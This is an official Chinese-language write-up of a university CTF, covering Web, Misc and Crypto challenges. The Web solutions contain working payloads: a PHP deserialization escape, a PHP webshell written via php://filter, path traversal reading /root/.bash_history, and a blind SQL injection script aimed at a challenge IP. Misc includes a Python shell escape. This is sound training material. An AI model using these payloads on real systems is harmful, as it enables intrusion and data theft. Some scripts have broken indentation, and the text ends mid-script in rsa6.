WUSTCTF2021官方Write-up

前言

这场比赛没有AWD，只有线下解题赛，还是在校内举行的，历时8个小时，仅限本校学生参加哦！

正文

Web

寻宝

根据提示，访问robots.txt ；访问给出的博客，根据提示 old!old!old! ，推测和时间有关，从后往前找线索，在最后（发布时间最早）的博客old_blog里发现线索；根据新线索访问 /get_final_treasure.php。

<?php
header("Content-Type:text/html;charset=utf-8");
highlight_file(__FILE__);
include "flag_3.php"; // "最后的宝藏在flag_3.php的$flag里你能发现他么?";
$hello = "world";
$world = "hello";
if ( !isset($_POST["flag"]) )
die($hello);
foreach ($_GET as $key => $value)
$$key = $$value;
foreach ($_POST as $key => $value)
$$key = $value;
if ( $_POST["flag"] !== $flag )
die($hello);
echo "give_you_flag!: ". $flag . "\n";
die($world);
?>

简单的可变变量，我使用的是$world，题目给的echo "give_you_flag!: ". $flag . "\n"; 用不了。payload：

GET:world=flag
POST:flag=1

$world在$flag值变化前接受了其值，所以不会受到影响。拼接三部分的flag，提交。

Ezserialize

字符型反序列化，减少还是增加都可以，我选择的是字符增加型（字符减少型是最简单的），计算涉及的字符数为79，下方是编码后的待逃逸：

%22%3Bs%3A10%3A%22%00%2A%00vertify%22%3BO%3A5%3A%22admin%22%3A1%3A%7Bs%3A7%3A%22
%00%2A%00flag%22%3Bs%3A20%3A%22flag%7BThis_fake_flag%7D%22%3B%7D%7D

用flag和union来完成逃逸，前者为2，后者为1：

POST：
username=aaa&password=aflagflagflagflagflagflagflagflagflagflagflagflagflagflagf
lagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagf
lagflagflagflagflagunion%22%3Bs%3A10%3A%22%00%2A%00vertify%22%3BO%3A5%3A%22admin
%22%3A1%3A%7Bs%3A7%3A%22%00%2A%00flag%22%3Bs%3A20%3A%22flag%7BThis_fake_flag%7D%
22%3B%7D%7D

发送请求后拿到flag。

hacker’s gift

这个题目我用了一个提示，不得不说，看提示让我想爆打出题人，“找后台打弱口令”…… 访问/admin自动跳转到后台登录页面，手动爆破，经过漫长而痛苦的测试，找到弱口令。（鬼知道我经历了什么，还好admin666这样的弱口令曾经折磨过我）payload：

username=admin
password=admin888

进入后台，根据题目名称，有礼物；这里通过备份数据库文件 getshell的方法。因为没有开启 x13 插件而行不通，差点就冲动花100元给服务器买这个插件了；在后台的网站安全项里有检测木马功能，检测一遍，发现后门文件media/door.php；文件内容有近似于无的混淆，跟着过程走，把最后的代码拼出来，大概是<?php @eval($_POST['wen']);?>。

链接木马，到根目录取得flag。

Writeshell

题目的源代码是：

<?php
highlight_file(__FILE__);
$filename=$_POST['filename'];
$res=["hacker"=>$_GET['cmd']];
$code = '<?php return [';
foreach ($res as $key => $value)
{
$code .= '\'' . $key . '\'' . '=>' . '\'' . $value . '\'' . ',';
}
$code .= ']; ';
file_put_contents($filename,$code);
?>

考点明确，php://filter的使用 这里的问题在于我们写入的文件会作为return后面的内容，无法实现任意代码执行。就要想办法跳出来，此处相当于绕过死亡函数，单纯使用write=convert.base64-decode会因为=的存在不能成功， 所以最后使用write=string.strip_tags|convert.base64-decode，并且传参要闭合return。payload：

GET：
cmd=];?>PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz5h //<?php
@eval($_POST['cmd']);?>a
POST：
filename=php://filter/write=string.strip_tags|convert.base64-
decode/resource=a.php

蚁剑链接a.php，找到根目录下的flag。

足迹

根据题目提示，搜索禅知1.6历史漏洞，发现前台任意文件读取，访问如下可实现任意文件读取：

http://127.0.0.1/file.php?pathname=../index.php&t=txt&o=source

看首页给的提示：

<h2>这该死的黑客为了拿到flag,把环境破环成这个鬼样子啦。</h2>
<h2>这个黑客以root身份进入到了服务器拿到了flag</h2>
<h2>奥对了，听说这个版本是禅知1.6哦</h2>

结合题目名称”足迹“，推测要读取日志类型的文件。

比赛时没做出来，赛后出题人说要看记录了执行过的命令的文件；到这里才清楚要包含的方向，比赛时包含的是各种日志来看踪迹，但是要么没有关系，要么出题人基本都删了（留了最后的Shell历史命令 记录文件）；这里要读取root用户的Shell历史命令文件：

http://127.0.0.1/file.php?pathname=../../../../../../../../../root/.bash_history&t=txt&o=source

在记录中，可以看到这段信息：

#1630747485
find / -name flag
#1630747488
clear
#1630747490
cd /
#1630747491
ls
#1630747495
cat flllllllllllllllll1ag

所以用以下payload读取flag：

http://127.0.0.1/file.php?pathname=../../../../../../../../../flllllllllllllllll1ag&t=txt&o=source

WUST颜值查询2.0

过滤了"，'，, ，=，空格，if，like，regexp，--+，sleep ，benchmark ，join这个注入的语句很奇怪，不太懂后台原理（不会开发T^T），之后要和出题人”聊一聊“ 起手测试类型：id=1没有爆错，字母报错，为数字型；这里偶然测试了id=database()发现回显了欢 迎信息（做到后面就会发现在id=0，4，5时有欢迎信息），说明为盲注型。

目前我所知的范围内，时间盲注无法使用，考虑布尔盲注，构造如下测试语句，页面回显欢迎信息：

(select/**/case/**/1/**/when/**/1/**/then/**/database()/**/else/**/1/**/end)

爆出当前数据库名，下为测试语句，回显欢迎信息；脚本跑出当前数据库名test：

(select/**/case/**/1/**/when/**/(ascii(substr(database()/**/from/**/1/**/for/**/
1))>1)/**/then/**/database()/**/else/**/1/**/end)

爆所有数据库名，下为测试语句，回显欢迎信息；跑出数据库 information_schema，mysql，performance_schema，sys，test：

(select/**/case/**/1/**/when/**/(ascii(substr((select(group_concat(schema_name))
from(information_schema.schemata))/**/from/**/1/**/for/**/1))>1)/**/then/**/data
base()/**/else/**/1/**/end)

爆出test库的表名，下为测试语句；跑出ctf，flaaaaag：

(select/**/case/**/1/**/when/**/(ascii(substr((select(group_concat(table_name))f
rom(information_schema.tables)/**/where/**/table_schema/**/in/**/(select/**/data
base()))/**/from/**/1/**/for/**/1))>1)/**/then/**/database()/**/else/**/1/**/end
)

卡在爆列名上。最后手动测试（猜）出ctf表的两个列名 id，name；flaaaaag表的一个列名id。

经过一番思索，找出了可用于筛选的where条件：

where/**/ascii(substr(table_name/**/from/**/8/**/for/**/1))>102/**/and/**/ascii(
substr(table_name/**/from/**/8/**/for/**/1))<104

含义为限定寻找字段 table_name 中，值第8位字符的ASCII介于102到104之间的数据，通过此种方法， 减小查询范围。下面放出脚本：

#这用于简单的get传参bool盲注
import requests
import time

url = "http://118.31.32.88:8095/?"
temp = {"id" : ""}
column = ""
for i in range(1,1100):
    time.sleep(0.03)
    low = 32
    high =128
    mid = (low+high)//2
    while(low<high):
        #爆当前库名
        temp["id"] = "(select/**/case/**/1/**/when/**/(ascii(substr((select/**/database())/**/from/**/%d/**/for/**/1))>%d)/**/then/**/database()/**/else/**/1/**/end)" %(i,mid)
        #爆所有库名
        #temp["id"] = "(select/**/case/**/1/**/when/**/(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata))/**/from/**/%d/**/for/**/1))>%d)/**/then/**/database()/**/else/**/1/**/end)" %(i,mid)
        #爆表名
        #temp["id"] = "(select/**/case/**/1/**/when/**/(ascii(substr((select(group_concat(table_name))from(information_schema.tables)/**/where/**/table_schema/**/in/**/(select/**/database()))/**/from/**/%d/**/for/**/1))>%d)/**/then/**/database()/**/else/**/1/**/end)" %(i,mid)
        #爆字段
        #temp["id"] = "(select/**/case/**/1/**/when/**/(ascii(substr((select(group_concat(column_name))from(information_schema.columns)/**/where/**/ascii(substr(table_name/**/from/**/8/**/for/**/1))>102/**/and/**/ascii(substr(table_name/**/from/**/8/**/for/**/1))<104)/**/from/**/%d/**/for/**/1))>%d)/**/then/**/database()/**/else/**/1/**/end)" %(i,mid)
        #爆值
        #temp["id"] = "(select/**/case/**/when/**/(ascii(substr((select/**/group_concat(f1ag)from/**/`flaaaaag`)/**/from/**/%d/**/for/**/1))>%d)/**/then/**/database()/**/else/**/1/**/end)" %(i,mid)
        r = requests.get(url,params=temp)
        #time.sleep(0.05)
        #print(low,high,mid,":")
        if "hello" in r.text:
            low = mid+1
        else:
            high = mid
        mid =(low+high)//2
    if(mid ==32 or mid ==127):
        break
    column +=chr(mid)
    print(column)
    
print("All:" ,column)

Misc

signin

零宽度字符隐写+emoji-aes。

py2

__import__('os').system('/bin/sh')

ezsteg

用stegsolve打开图片，在red plane 0通道发现G plane通道有东西。 保存Green plane 0的图片然后用stegsolve的Image Combiner功能进行对比。 发现了前⼀半flag还有后⼀半flag的提示是用QIM量化，步长为20。在github搜索QIM quantization搜到这个网址：https://github.com/pl561/QuantizationIndexModulation/blob/master/qim.py。仿照里面的`test_qim`进行函数重写，发现结果里的msg_detected全是1和0，把所有的0都改成255，再保存成新的图片，得到后一半flag。

脚本：

def my_test_qim():
 delta = 20
 qim = QIM(delta)
 y = cv2.imread('./ezsteg.png')
 z_detected, msg_detected = qim.detect(y)
 for i in tqdm(range(len(msg_detected))):
 for j in range(len(msg_detected[i])):
 for k in range(len(msg_detected[i][j])):
 if msg_detected[i][j][k] == 1:
 msg_detected[i][j][k] = 255
 cv2.imwrite('flag.png', msg_detected)

babypcap

鼠标流量题，CSDN能搜到脚本：

# f=open('usbdata.txt','r')
# fi=open('out.txt','w')
# while 1:
# a=f.readline().strip()
# if a:
# if len(a)==8: # ⿏标流量的话len改为8
# out=''
# for i in range(0,len(a),2):
# if i+2 != len(a):
# out+=a[i]+a[i+1]+":"
# else:
# out+=a[i]+a[i+1]
# fi.write(out)
# fi.write('\n')
# else:
# break
# fi.close()

nums = []
keys = open('out.txt','r')
f = open('xy.txt','w')
posx = 0
posy = 0
for line in keys:
	if len(line) != 12 :
		continue
 	x = int(line[3:5],16)
 	y = int(line[6:8],16)
 	if x > 127 :
 		x -= 256
 	if y > 127 :
 		y -= 256
 	posx += x
 	posy += y
	btn_flag = int(line[0:2],16) # 1 for left , 2 for right , 0 for nothing
 	if btn_flag == 2 : # 1 代表左键
 		f.write(str(posx))
 		f.write(' ')
 		f.write(str(posy))
 		f.write('\n')
f.close()

forensic

Volatility hashdump

Crypto

checkin

签到题，直接上脚本：

from libnum import *
from gmpy2 import *

a =
9631670005361998234982649808225984489506338024056702200592851391520
4024844540469555622671378420860794984950658042831492783861955562369
1571514215161194613947761984811384149579480986395179616923334686396
1464392950546233697674024508779088135862120191099869255630921864806
1409226131514631759925556900619868423867
p =
1772397479946330723163700367177958503809469527323645748555263786917
7494640588817688783672929857654918650734584203142823924210712356092
7684315092976659481316206341152868428190256155821018749939785354467
6112482960429296616190152426855278860415557236374173007912427682616
81522882474858447747878003388616705422171
c =
3124981003034002486770151625321612487379837376292128516032667813037
3368708545564162489355490838932695325242212478465783024384459580684
9256422812022701898553861587130501162228906094036586640090856008471
9498962523321776520567037375918102170844317963453709006654697325297
2859914381008999790882607671941093099299
ni = invert(a, p)
m = c * ni % p
print(n2s(int(m)))

P.S.以下题目都只有脚本！

base

s = 'zCN7zTIOntz8zCiPzsQQzCySltr8m9mJyCiMmsQMmPmRzwyPzdfBowzZ='
b_char =
'abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ+/'
b = ''
for i in s:
 	for j in range(len(b_char)):
 		if i == b_char[j]:
 			b += str(bin(j)).replace('0b', '').zfill(6)
flag = ''
for i in range(0, len(b), 8):
 	flag += chr(int(b[i: i+8], 2))
print(flag)

random1

# py2
import random
import gmpy2
from libnum import *

n =
144573683990296079611135474661197492569962285163118264304760128514
378450625043070474838075626723354220121948920313400664358341070757
676498630899262349227958025807395866103391135742530910291132519036
950667849498017553807524999532071920009738654477379676790400942232
810106883328105428161410721145229679023998881
c =
140936410048438311250552166359315531524717850408136878422422753861
467709727494132943441793325459384490656351395836085596063714127829
696538515364822908513326788824368390411397265861249839989684310498
194231709180660320399728106109349119244510966442534818280589033645
304725341767217060885195904689618851168472021
res = [
 224, 32, 63, 37, 139, 9, 37, 205, 108, 41, 237, 68, 40, 206,
48, 112, 239,
 85, 232, 0, 168, 105, 214, 13, 185, 107, 27, 176, 219, 55,
128, 25, 80,
 249, 88, 86, 32, 6, 110, 20, 171, 220, 249, 251, 26, 52, 149,
234, 60, 145,
 126, 25, 207, 5, 42, 0, 199, 155, 56, 142, 199, 37, 4, 76,
173, 138, 195,
 112, 145, 123, 175, 178, 123, 73, 32, 223, 200, 254, 135, 94,
156, 97, 67,
 252, 31, 179, 245, 231, 90, 60, 77, 63, 167, 33, 136, 40, 210,
219, 226,
 164, 164, 45, 122, 85, 29, 59, 86, 123, 251, 126, 37, 9, 119,
45, 142, 187,
 7, 57, 84, 169, 82, 192, 244, 191, 62, 62, 37, 25, 160, 141,
248, 147, 128,
 236, 123, 64, 177, 110, 50, 39, 143, 73, 172, 35, 4, 15, 180,
101, 78, 46,
 164, 35, 242, 70
]
seeds = [
 9999, 1247, 5097, 7717, 7026, 8398, 961, 3156, 1271, 7473,
3669, 6716,
 7550, 1426, 8065, 351, 738, 4057, 877, 4029, 7606, 1822, 7749,
7973, 9666,
 5927, 7944, 1240, 8960, 443, 6349, 5949, 5913, 2332, 7255,
5185, 5504,
 3499, 8855, 4183, 8812, 5865, 4147, 5091, 4556, 1968, 5589,
2481, 3411,
 514, 589, 8078, 9590, 1765, 1009, 4415, 6603, 3978, 9215,
5307, 3804, 1141,
 6691, 1760, 101, 7008, 6165, 9974, 1194, 3665, 7579, 1148,
5786, 6175,
 1333, 7932, 8217, 9058, 5400, 6527, 6220, 1111, 4265, 208,
2191, 9706,
 1019, 7249, 7644, 907, 5679, 3335, 3181, 5301, 4977, 2455,
724, 4447, 3566,
 9161, 1289, 181, 3509, 6305, 8183, 4024, 2630, 131, 1822,
8918, 5595, 6849,
 2555, 4221, 3023, 5828, 5622, 5812, 2378, 746, 3608, 822,
4856, 6987, 9977,
 5289, 342, 5418, 9974, 5291, 6895, 9663, 3642, 2965, 8003,
5830, 6373,
 3394, 8308, 6754, 4843, 2100, 1355, 5166, 601, 9987, 8921,
7563, 2250,
 9056, 2873, 7479, 5508, 109
]
dp = ''
for i in range(len(seeds)):
 	random.seed(seeds[i])
 	rands = []
 	for j in range(4):
 		rands.append(random.randint(0, 255))
 	dp += chr(rands[i % 4] ^ res[i])
dp = int(dp)
e = 0x10001

n =
144573683990296079611135474661197492569962285163118264304760128514
378450625043070474838075626723354220121948920313400664358341070757
676498630899262349227958025807395866103391135742530910291132519036
950667849498017553807524999532071920009738654477379676790400942232
810106883328105428161410721145229679023998881
c =
140936410048438311250552166359315531524717850408136878422422753861
467709727494132943441793325459384490656351395836085596063714127829
696538515364822908513326788824368390411397265861249839989684310498
194231709180660320399728106109349119244510966442534818280589033645
304725341767217060885195904689618851168472021
for i in range(1, e):
 if (dp * e - 1) % i == 0:
 if n % (((dp * e - 1) // i) + 1) == 0:
 p = ((dp * e - 1) // i) + 1
 q = n // p
 phi = (q - 1) * (p - 1)
 d = gmpy2.invert(e, phi)
 m = pow(c, d, n)
 print(n2s(m))

random2

from Crypto.Util.number import *
from Crypto.Cipher import AES
from mt19937predictor import MT19937Predictor

keys = [74737492451949886796883447380,
51358027370976380985099489502,
412762483065178295255791439485932171376749700084, 910689806,
1149695904, 3104053370, 221975799, 3823412020, 958468189,
3586356097, 340817801, 2878068849, 2732757663, 2018092082,
1847897227, 1759748212, 1295396426, 2794984001, 4265922173,
3532941962, 3649453440, 1086966694, 2188196779, 1036830362,
3114332204, 2720067903, 3763019658, 4220680032, 1434665040,
2867449357, 327630472, 4028025891, 1107232876, 1341894502,
3410775936, 792029308, 2140406850, 618481849, 3329607978,
1024829298, 1620771375, 1042727260, 1141119170, 2850063412,
722634918, 109575186, 1993029882, 2096912385, 866181039,
827908342, 1718528485, 1617437693, 3893036959, 2846991704,
3366375532, 2763086122, 2690998389, 1148589641, 1571939581,
2933947318, 4121295833, 3030689848, 1790011374, 109272014,
121093659, 4007439172, 831512040, 978840109, 3000990210,
3025633350, 1335144143, 4107810622, 1035611013, 3925921218,
1398042454, 1123546694, 4161792772, 1177640646, 4066189210,
2240592239, 508327944, 839225012, 1605466793, 2875695963,
626270177, 1371375933, 11364760, 3470778132, 1706915094,
1458410373, 98854289, 1392252258, 1560427103, 3615589636,
147666569, 1045773025, 4263298490, 3895751869, 2691680307,
1699526232, 3685180876, 729503966, 554847696, 1562590775,
3563661002, 963617489, 3181526105, 2184215744, 2144648457,
1109270973, 3071342721, 2842429183, 668733579, 1262667392,
772190169, 1000365415, 3453506497, 412844225, 9975293, 919025159,
3317679250, 2335686357, 1608848888, 2579223536, 1816878070,
3734808856, 269077113, 2396885783, 1147867931, 2331502665,
2928315805, 908907677, 1009287219, 1017406485, 3870217028,
1835376973, 890949168, 671845795, 3380480668, 4171623559,
1662988401, 3709126631, 2520677766, 1660449390, 120494599,
907225530, 3665272463, 136171352, 1758076339, 3009587924,
2866084549, 3656368543, 1692972691, 714237605, 892521830,
1942496649, 4241764492, 930308540, 3340229942, 773043293,
3514688079, 1318180965, 1669012263, 3638042505, 3025395295,
226129302, 153479541, 2764571825, 3421587858, 334668853,
1330796170, 218556632, 972714166, 922603164, 4024647445,
4233196368, 1249046751, 3667925019, 2276336634, 3644888947,
1444996806, 413210699, 2208048223, 3813568258, 2345486173,
487998086, 477969329, 3409170127, 3568976035, 3460493127,
2697206478, 1262489351, 4011219190, 1419296521, 1307871567,
270455245, 4245043905, 687578193, 1070246561, 185531160,
2626503659, 3372671141, 3673238883, 2542194104, 4260369384,
67076509, 4164858072, 3344428349, 2674528215, 2352981085,
4188340133, 2490407345, 2277623345, 578009254, 589898778,
2257425250, 4264855682, 3217088425, 1918678675, 2409396248,
366216060, 2318262020, 2695905062, 1588352782, 1427064824,
470125313, 3305196643, 1839661592, 2584820258, 299694866,
4205679150, 3105720803, 2804340888, 3893613342, 733876896,
232917987, 2727309654, 1790439074, 1927738154, 4017472905,
1863059250, 655457188, 3759472447, 4183317773, 797877611,
2699417810, 803278050, 3877877653, 1586583099, 3875432289,
111221042, 233407522, 3347300855, 3873882496, 3741842610,
717425034, 2557158550, 876205693, 683472955, 3676324193,
758448123, 1995439610, 2943722151, 1610689376, 4230997558,
802060680, 2861576590, 960427169, 2361123516, 2886027757,
271492995, 3597341957, 1973308613, 687254699, 2103809719,
1260885931, 2906748062, 873332944, 3671891228, 2490863425,
274650518, 990260178, 989305697, 3765783495, 3579353903,
1372910559, 165320956, 896735304, 3564054930, 2374613969,
786938917, 3955168292, 2134822172, 1403480802, 1340392765,
3154014116, 1793814283, 1981841272, 1873394217, 4217089972,
3403224767, 111486932, 1370301502, 1137722044, 1454768737,
2817161685, 1373532601, 88198402, 1162901466, 1764878443,
3204368881, 764246346, 3192119660, 876165427, 4104033361,
2154934077, 1561430573, 826991304, 849458135, 4188058136,
1199351023, 2127952015, 2094038064, 300699273, 3378157804,
6679715, 559293910, 3028818176, 2490265745, 3646800433,
1746603729, 1531309519, 18564847, 3452425344, 1989426082,
2251367880, 1426356258, 2425736463, 1600248295, 955344576,
3502485031, 1323390407, 399691485, 1835777771, 1828335677,
3348082301, 3687268482, 2457400649, 3368374393, 1119303358,
1270433121, 3059691677, 2392910075, 591224638, 1311675618,
4122050325, 4014348903, 2095907405, 1519824911, 2825776887,
3354142321, 1098235797, 1481266867, 1051367302, 1263016096,
1336057651, 1683842359, 4054448354, 1491994207, 1160110019,
3222808831, 177510926, 423347477, 803602771, 2683641253,
2919035439, 2485161789, 3378544338, 1610409532, 1545641821,
546762619, 2395983270, 3838745031, 789177414, 2123719243,
3476088109, 1615713790, 1335041829, 4006963851, 1700197865,
73798124, 1251950799, 2448692292, 937465221, 2191277155,
2283183462, 3235943428, 1888733145, 1637420644, 2906472352,
538528848, 1787881095, 2527345959, 816324140, 780626095,
3958671235, 1060151404, 3939612973, 720163439, 3130037256,
868218434, 594717218, 2378649142, 630567292, 272416131,
2656750985, 2254309115, 398769631, 144191385, 3584257427,
2276368553, 4037163602, 2651140730, 2231274829, 1953622167,
4083152642, 3006733661, 929392152, 843949652, 2714951407,
810363743, 1283798592, 3121903325, 1988057118, 356119324,
1904222878, 4044843055, 112669104, 868692487, 1115920155,
1623439582, 488326378, 148287535, 3338996246, 2166938666,
3797453833, 1474427255, 1386753952, 3317126798, 2190807666,
4259624962, 3066765455, 2382942891, 4046402452, 3243966738,
1774858251, 3181254579, 2171453049, 905778132, 1409024919,
4082347550, 1308497825, 3944454243, 1681570359, 3622008213,
1130389974, 3937594426, 4193387111, 4156444245, 1665819644,
4099931325, 546382740, 3459524364, 3215392046, 628790677,
2460115724, 4154656625, 1738275004, 372632247, 3901053671,
1968302733, 1542557146, 954360221, 94489421, 2526265974,
3493620125, 227040704, 1966827767, 2710288704, 1777503765,
3060587047, 2922448684, 1818271608, 3774695159, 198891092,
1892315134, 1988189925, 1877360903, 176031450, 782372078,
2630033970, 222585085, 1784220674, 187019927, 3793161227,
275394451, 3620112924, 1046758031, 794695465, 4020417715,
1036350909, 1034143101, 130770292, 3376762604, 3099991375,
1317943524, 538393453, 1676278328, 3728445031, 2444153711,
1294577644, 3255702608, 382221508, 501348604, 1545416914,
4046130944, 1518955393, 3919525514, 1729967634, 2572204860,
3777225961, 1646036822, 475018472, 2247517569, 4257731164,
1111295866, 524303023, 3981652986, 4072216404, 3747688429,
1885894640, 833446526, 3955045968, 1703975805, 1141801012,
2437322873, 2732846667, 1371506834, 669098384, 1963802511,
1542039, 728580454, 4041454310, 1019581040, 3144560205,
1329189307, 1043039655, 1028345076, 3541168610, 2082983922,
1305525731, 1078333930, 556043109, 3570861415, 1623319076,
3514585273, 223719132, 4031808254, 2549094947, 3825858427,
3214724358, 1835103180, 2471774591, 2111554082, 2948121215,
1362405065, 3765638194, 491471279, 2479158340, 3749279021,
3306251008, 2577577664, 1245538106, 503105027, 139202844,
2287890849, 3563168099, 1467460138, 3922094655, 1903765924,
3858903218, 3343562703, 2145132444, 1134537221, 2942539446,
914603375, 2155053085, 2864704965, 1971547127, 1892432263,
2604528206, 3387176542, 361652931, 2305859318, 1345198505,
2416327840, 887059258, 3219763770, 316636299, 307065443,
431437125, 4279494318, 220513368, 2362459616, 3712600310,
2105434588, 2938672182, 3316109731, 850677909, 1593089633,
1448569654, 2885245137, 3269946753, 885150079, 2358168430,
1785698607, 1757002566, 197277094, 47259139, 2710959991,
710476854, 1929434500, 1732169408, 381305673, 2982171232,
486112880, 3651033563, 734915423, 27291312, 93262695, 3206874794,
1595912125, 643556702, 2929755197, 1043917347, 3181953869,
3059173850, 986850461, 947059764]
c = b'\xd1\xfb\xd3\xf0U\x14\x18\xa9Yf=\xa6\x7fJ\xd0aZ=\xf7\xf6\x1e]\xe
7\x07\xbd\x0b\xc9\xf8\xe7k\xa7\x16\xc1Z:\xbf\xde\xea=3\xe0\x82\xf0
\xca\xd2R\x91\xf5\x0f\xd1\x06\x99G\xf6\x8dh\x9c\x14Wi\xaf\xdbFL'
p = MT19937Predictor()
for i in range(len(keys)):
 	if i == 0 or i == 1:
 		p.setrandbits(keys[i], 96)
 	elif i == 2:
 		p.setrandbits(keys[i], 160)
 	else:
 		p.setrandbits(keys[i], 32)
key = long_to_bytes(p.getrandbits(128))
cipher = AES.new(key, AES.MODE_ECB)
print(cipher.decrypt(c))

rsa1

from gmpy2 import *
from libnum import *
from sympy import Symbol, solve

n =
263052151036556444232718736542708962392867896951240903497496655347
030779174123048395688336426644503139350992983109808538822728799817
333727302920185445726253169028091645149821721819513197430720176978
455360183911938712805658076206187867575909179942661137373035486546
445794471527084919479819396932093770629328870790535356852229150496
389737447859101878464880480546145958969057175481735030979324869765
486066882840949851633878308711733511568723039018020638746431598720
760454218561616970207098415632535433010886733475628741782754576629
232683037514583732133798230917432542953920988520506573891006681965
43581156089543387981749
s =
432376188839801860985233550389630676768025468911830724991907694547
410028005322221611789033509728065581257970021014285097211403261937
551250809444470026826986129545436147993632348873493896748688708706
598577033716795240591686551434266756834488451291939047301372100578
334512777961405025668432954141993821521911163833487176922456680775
866961517713961933064426534927060923173636688850699937339935445357
097485623027343695665767355279725404478989885037160883765164270530
434676177658417006753634283995007755492171422341445272623175970167
289998177020590065417477197719215223167155568706057662505599557637
1428030016472160229195
c =
185248798750464547657804192919021615051871190493172574402026453621
845438569800378914461397473964726068841902955196930508257023983023
750353560733540304390924790764933502804918799426762325432720350096
197764486683676316747512700254224716976048073093289488117302117960
771945626052730682480030670840626049531809810926028252690824431948
217952675332595423452807894238853137150111987564082386752122949641
692318667501217828913929749825388837594604996549649166726467135613
652684976216699182605123181219874640872034889431924472446561205536
579046437688110556345268676421219772827477860194136763860877425871
20310706285467632914627
s = invert(s, n)
p = Symbol('p')
q = Symbol('q')
p, q = solve([p*q-n, 1314*p-520*q-s], [p, q])[1]
p = int(p)
q = int(q)
e = 0x10001
d = invert(e, (p-1)*(q-1))
print(n2s(int(pow(c, d, n))))

rsa2

from gmpy2 import *
from libnum import *

n =
238762654508575671358510287787810886201517908033296159863590222635
8817519910295819153349225103418927970241049968506375997
e = 65537
c_mod_p =
647648029783204084679833378591490303778808042166748545307033
c_mod_q =
716978243624820144982668239669070880505037391756433243913335
p = iroot(n, 2)[0]
for i in range(1000):
 	p -= 1
 	if is_prime(p):
 		q = next_prime(p)
 		if p * q == n:
 			break
d = invert(e, (p-1)*(q-1))
c = (c_mod_p*invert(q, p)*q + c_mod_q*invert(p, q)*p) % n
print(n2s(int(pow(c, d, n))))

rsa3

from gmpy2 import *
from random import *
from libnum import *

n =
188967873698125067291611467924205824630751952897051303321451254418
733590082594777787050506120280164455311715826994634692231291344971
445531181649912595395041875120212083157545145459965748626898887237
287793682780571588843094987919888248153809064898842219555690169130
020476901344950216383250763243372041203582891973454736452539648973
099366346746852564944679659947633462090885693129003103842218568901
296385897087044885700621705878221598400044718474296513355960658451
769226111774849793687011851983701434515540320977748838810639411649
281952061512850530239004175395451889814468232855924339638179819245
69149446287916824382561
d =
570303122491907732419973942059121870908287360781051578252740339220
307868569455744060617965508494647719854498579752945599835621330269
957605816844472774817054983902631306402960988762479598103580128883
884717221068545318785964533937694685480597142779529160717151510631
044297516166710458190688747759381052377384678111991309165223058531
657869796695644102505041170327954373518461540837282708604806776384
930402084497158641998559971529104925233730150484718391708603822536
680400960107170185458725761899190302759279222335987910397905015838
789849764531713411931658785602092604583448791594839180734620859416
6279941244305061329677
friend_keys = [111697, 106721, 116423, 88843, 119159, 70639,
80819, 74489, 121931, 101141]
c =
119943816277590261628991702431952059974733907534741058474443015994
713676303289993299715546728980427112583323434145558864911052354504
158749675009997777271882222017017906158004439996946613911616036082
055807440463406857401324629566694286332025388751977088534191270008
779080341556834184768390271768478250851917665006570639360873007076
481731676382121844099404413411924949737800785206580576287472357022
622616505330742074026659374590653420088138814836586558207941057332
543906000961886292517862570359580397970322576894467801506859165178
436658813407934921469807718087061030324980536021120464523763785971
81639545983846067945876
e = 0x10001
def getpq(n, e, d):
 	while True:
 		k = e * d - 1
 		g = randint(0, n)
 		while k % 2 == 0:
 			k = k // 2
 			temp = pow(g, k, n) - 1
 			if gcd(temp, n) > 1 and temp != 0:
 				return gcd(temp, n)
            
p = getpq(n, e, d)
q = n // p
e = friend_keys[::-1]
for i in e:
 	d = invert(i, (p-1)*(q-1))
 	c = pow(c, d, n)
print(n2s(int(c)))

rsa4

from gmpy2 import *
from libnum import *
n =
183442086222261455632753326316758528126379741172694105803563724847
308686300410877719678631773994684369071796299917132879587129181558
813229738078063019791207183379717666421411607154579591042300098658
324903342684007080573788727939697060587669341739017208076013812602
261097105286139148489114970449182731370969035223671208190169236130
116969565310787350408667268361472446276177528664496808185757505553
729250992038644652214672616437322584032823008305008570089510361002
404173056527129662717509633650568886696914765886734571691835755476
541735844114882890834797224475296874800939842148748401163866413086
48928664471249163053399
c =
579983521268267085460078742139430470076681265092933180830502478191
980980841411674193803308765417352242984843483101191354085788397676
380158573503149404435747599962380476958180615969553073532082998399
439749491026281226926618342896422724047909834218501687591646346386
927518053944991234743138821737299498766417181997016714589108746436
589998667396760703644779473147836486866951277972369272912352206040
320528602162853623679432136268470769811444759552382811051152158714
214669087494756604211508176703651519240852315758703606342867857688
122163468512773885694651433019810092928196342811091736957154981492
0857266365740708152342
e = 0x10001
p = gcd(n, c)
q = n // p
d = invert(e, (p-1)*(q-1))
print(n2s(int(pow(c, d, n) // p // 2021 // 1211)))

rsa5

from gmpy2 import *
from libnum import *

n =
891144984207806049175310331695963927694557383434158661755608277163
290383258850402302871671301535627210852180312905989243937107773841
953038680868615884968417761659604947541596656392698426712546417575
075348153361152791125779929640999825306786993897986335593649224451
10277096686903849847611549099340416648410741
c1 =
573595214164250048895743842869543903575784470761870418265549984302
785693931107075581595481607224881671252613779267809254500379109463
264954964587895170738468385721279941889478411443230506618785299911
942169058745706546683996471606931113993709928602734694405889614991
8834128185367804403864368930212475453509851
c2 =
836612803701856474484530054607170668909910001884273264050010969359
023715667241812072726592738016216398866914801553640098315936954666
777838655959716451005363698018156193371297668239384633381285547169
700368179528705698222083265831417459305574539697953348924935249748
70629590649696998539807821542822600655060074
e1 = 65536
e2 = 270270
s = gcdext(e1, e2)
s1 = s[1]
s2 = s[2]
if s1 < 0:
 	s1 = -s1
 	c1 = invert(c1, n)
elif s2 < 0:
 	s2 = -s2
 	c2 = invert(c2, n)
m = pow(c1, s1, n) * pow(c2, s2, n) % n
m = iroot(m, gcd(e1, e2))[0]
print(n2s(int(m)))

rsa6

# sage
from Crypto.Util.number import *

c =
792534797236942516602405443517723052170140376689765593638997623833
525502332370366568752423701218537804193723719392319671016105315635
523406644164531971118370184232962015770416637115765071722283961964
827115212868237291312609636578368752056498293716848478808131767547
446308313278458238418750786925588522885746781783147603597170544986
208068994799423044583975977509062978092895646925325128691641745565
565104807528491490973536526192938132172849121017114953492710063898
844399695122256742298334030165735207100449171055079117496974415925
167478748602909845452507560308635453872490997120605713695943364490
553428102487682775669613775497156017316624305860430262666205570472
